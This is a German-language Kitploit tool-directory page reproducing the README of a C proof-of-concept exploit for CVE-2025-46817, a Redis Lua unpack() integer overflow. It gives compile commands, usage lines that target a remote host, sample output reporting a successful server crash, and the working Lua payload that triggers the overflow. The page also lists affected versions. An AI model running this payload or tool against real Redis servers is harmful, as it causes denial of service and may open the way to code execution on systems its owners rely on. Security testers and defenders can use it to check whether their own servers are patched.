Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
SchwachstellenanalyseExploitationFuzzingPenetrationstestsDatenbanksicherheit
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

C-basierter Exploit für CVE-2025-46817, eine Redis-Integer-Overflow-Schwachstelle, die Crash-Erkennung und potenzielle RCE über Lua-unpack()-Payload ermöglicht.

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-46817 Redis Integer Overflow Exploit

Banner Language Platform

Eine schlanke C-Implementierung des Exploits für die Redis-Integer-Overflow-Schwachstelle CVE-2025-46817.

🚀 Funktionen

  • Schlank: Einzelne C-Datei, keine externen Abhängigkeiten außer hiredis
  • Schnell: Native Kompilierung für maximale Leistung
  • Farbige Ausgabe: Schöne Terminalfarben und Symbole
  • Absturzerkennung: Erkennt Serverabstürze automatisch
  • Versionsprüfung: Identifiziert verwundbare Redis-Versionen
  • Timeout-Unterstützung: Konfigurierbare Verbindungs-Timeouts

📋 Anforderungen

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 Kompilierung

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 Verwendung

Grundlegende Verwendung

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

Remote-Ziel

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

Befehlszeilenoptionen

root@kitploit:~
-H <host>    Redis-Server-Host (erforderlich)
-P <port>    Redis-Server-Port (erforderlich)  
-t <timeout> Verbindungs-Timeout in Sekunden (Standard: 10)
-h           Hilfemeldung anzeigen

📊 Beispielausgabe

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    CVE-2025-46817 Exploit-Tool
                   Integer Overflow -> RCE-Kette
                   Zugriff -> https://pwnbuffer.org/

    Autor: Slayerkkk
    Ziel: Redis <= 8.2.1
    Typ: Speicherkorruption -> Codeausführung

ℹ️ Teste Verbindung zu 127.0.0.1:6379...
✅ Verbindung erfolgreich
ℹ️ Redis-Version: 8.2.1
❌ VERWUNDBAR - Version <= 8.2.1
ℹ️ Teste Lua-Scripting...
✅ Lua aktiviert (1+1=2)

🚀 STARTE AUSNUTZUNG
==================================================
💀 Führe Exploit-Payload aus...
    Payload: Integer Overflow via unpack()
💥 SERVER ABGESTÜRZT - Verbindung verloren!

📊 AUSNUTZUNGSERGEBNIS
==============================
  💥 Status: abgestürzt (2.34s)

💀 AUSNUTZUNG ERFOLGREICH - Server abgestürzt!
   CVE-2025-46817-Schwachstelle bestätigt

🛡️ Betroffene Versionen

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Technische Details

Schwachstelle

Der Exploit zielt auf einen Integer Overflow in der Lua-unpack()-Funktionsimplementierung von Redis (luaB_unpack). Bei Aufruf mit bestimmten Parametern läuft die vorzeichenbehaftete Integer-Arithmetik über, wodurch Redis versucht, eine enorme Anzahl von Rückgabewerten zu materialisieren.

Exploit-Payload

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Auswirkungen

  • Serverabsturz: Sofortige Denial-of-Service
  • Speicherkorruption: Heap-/Stack-Korruption
  • Potenzielle RCE: Speicherkorruption könnte zur Codeausführung führen

🎯 Erkennungsergebnisse

Das Tool meldet einen dieser Status:

  • ✅ überlebt: Server hat die Payload verarbeitet (wahrscheinlich gepatcht)
  • 💥 abgestürzt: Server abgestürzt (verwundbar)
  • ⚠️ timeout: Server hängt (wahrscheinlich verwundbar)
  • ❌ fehler: Anderer Fehler aufgetreten

🙏 Danksagungen

Autor: Slayerkkk
Website: https://pwnbuffer.org

Tool herunterladen